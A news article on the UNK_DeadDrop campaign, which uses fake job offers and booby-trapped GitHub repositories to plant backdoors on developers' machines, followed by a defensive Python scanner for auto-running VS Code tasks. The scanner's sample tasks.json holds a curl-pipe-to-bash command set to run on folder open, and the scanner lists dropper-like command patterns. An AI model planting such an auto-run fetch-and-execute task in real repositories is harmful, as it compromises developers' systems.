North Korean Hackers Target Developers via GitHub
North Korea-aligned hackers are targeting the developer community by planting malicious code in GitHub repositories. The campaign, tracked as UNK_DeadDrop, lures developers with fake job offers and code review requests. The goal is to get the target to clone a repository and open it in their editor, at which point malware is installed on their system without their knowledge.
Between April and May 2026, over 250 phishing emails were sent to individuals in nearly 100 organizations. These attacks primarily targeted the finance, cryptocurrency, education, and technology sectors, with a focus on companies in the United States. The hackers used realistic company names and professional sender domains to appear legitimate.
Phishing Campaigns and Malware Deployment
According to Proofpoint, a cybersecurity firm, this activity is likely conducted by a North Korea-aligned group that is distinct from, but similar to, the Contagious Interview group. No direct infrastructure overlap was found, but the tactics closely match. The malware is cross-platform, affecting macOS, Linux, and Windows, and uses the Go-based Overlord framework to maintain a persistent command-and-control connection.
This campaign is particularly dangerous because it blends into developers' regular workflows: cloning a repository and opening it in an editor is routine. A developer who receives a seemingly genuine email about a technical assignment might do exactly that and unwittingly trigger the attack.
Malicious Use of GitHub Repositories
Phishing emails lure developers to GitHub or GitLab repositories that mimic legitimate coding projects. The emails resemble job recruitment or code review requests from senders posing as companies such as Pulsynk and Ondo Finance. When a developer clones one of these repositories and opens it in Visual Studio Code or Cursor, hidden configuration files in the project cause the editor to run malicious scripts automatically, compromising the system.
On macOS and Linux, a component posing as a Google service installs a malicious VS Code extension, which launches the Overlord backdoor. On Windows, the payload runs inside the editor's own process and never writes a binary to disk, which helps it evade file-based detection.
Credential Theft and Data Exfiltration
Once active, the malware goes after credentials. On macOS, a fake system dialog prompts the user for their device password, which the malware then uses to unlock browser credentials. On Linux, the same trick is performed with Zenity dialogs. On Windows, the malware bypasses Chrome's App-Bound Encryption to extract stored browser credentials.
The stolen data, including cryptocurrency wallet contents and browser cookies, is collected and sent to a server controlled by the attackers. Developers, especially those handling cryptocurrency in DeFi or blockchain sectors, are at significant risk.
Security teams should inspect repositories that developers are asked to clone for hidden .vscode folders and unexpected tasks.json files, in particular tasks configured to run automatically when the folder is opened. Organizations should also disable automatic task execution in Visual Studio Code (the task.allowAutomaticTasks setting), keep Workspace Trust enabled so that freshly cloned folders open in Restricted Mode, and monitor network traffic for unusual outbound connections.
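To make that recommendation concrete, here is a small scanner, added as an example here and not code from the article or from Proofpoint, that a security team could run over a checkout before anyone opens it in VS Code or Cursor. It parses .vscode/tasks.json (VS Code's JSON-with-comments dialect), flags tasks whose runOptions.runOn is folderOpen, tasks hidden from the user, and commands that fetch and execute remote content. The sample tasks.json and the suspicious-command list are constructed for this example and are not indicators from the campaign.

```python
"""Added example (not the article's or Proofpoint's code): find VS Code tasks that auto-run when a folder is opened."""
import json
import os
import re
import tempfile

# Illustrative patterns (an assumption, not a published indicator set): things a build task rarely needs.
SUSPICIOUS_CMD = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|base64|powershell|pwsh|osascript|zenity|eval|"
    r"(?:python3?|node|bash|sh)\s+-[ce]|code\s+--install-extension)\b", re.IGNORECASE)

# Constructed sample tasks.json: one benign task and one DeadDrop-style auto-run task.
# VS Code accepts // comments and trailing commas here, so plain json.loads() rejects it.
SAMPLE_TASKS_JSON = r'''{
    // See https://go.microsoft.com/fwlink/?LinkId=733558 for the format
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        { "label": "update-deps", "type": "shell", "command": "bash",
          "args": ["-c", "curl -fsSL https://example.invalid/setup.sh | bash"],
          "presentation": { "reveal": "never" },
          "runOptions": { "runOn": "folderOpen" } }
    ]
}'''

def strip_jsonc(text):
    """Remove // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # copy the escaped char too (handles \")
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):           # skip to end of line, keep the newline
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    # Regex trailing-comma strip for brevity; it would also hit a literal ", }" inside a string.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))

def scan_tasks_json(text):
    """One finding per task that auto-runs, hides its output, or runs a dropper-like command."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        auto = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = bool(task.get("hide")) or (task.get("presentation") or {}).get("reveal") == "never"
        cmd = " ".join(str(p) for p in [task.get("command", "")] + list(task.get("args") or []) if p)
        match = SUSPICIOUS_CMD.search(cmd)
        reasons = []
        if auto:
            reasons.append("runs automatically on folder open (runOptions.runOn = folderOpen)")
        if hidden:
            reasons.append("hidden from the user (hide: true or presentation.reveal = never)")
        if match:
            reasons.append(f"command contains '{match.group(0)}'")
        if reasons:
            findings.append({"label": str(task.get("label", "<unnamed>")), "command": cmd, "auto": auto,
                             # auto-run plus a download/execute command is the combination that matters most
                             "severity": "high" if auto and match else "medium", "reasons": reasons})
    return findings

def scan_repo(root):
    """Walk a checkout and scan every .vscode/tasks.json it contains (skipping .git)."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                results.append((os.path.relpath(path, root), scan_tasks_json(fh.read())))
    return results

def demo_scan_temp_repo():
    """Write the constructed sample into a throwaway checkout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, ".vscode"))
        with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return scan_repo(root)

if __name__ == "__main__":
    for path, findings in demo_scan_temp_repo():
        for f in findings:
            print(f"[{f['severity'].upper()}] {path}: task '{f['label']}' runs: {f['command']}")
            for reason in f["reasons"]:
                print("   -", reason)
```

Run it as a script to see the constructed sample flagged, or call scan_repo() on a real checkout from a pre-clone hook or CI job. Pair it with the editor-side controls: set "task.allowAutomaticTasks": "off" in user settings so folderOpen tasks never start without an explicit prompt, and keep Workspace Trust enabled so a freshly cloned folder opens in Restricted Mode, where tasks are not executed at all. The scanner covers only the tasks.json vector described above; a malicious extension installed by the first stage needs a separate check.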
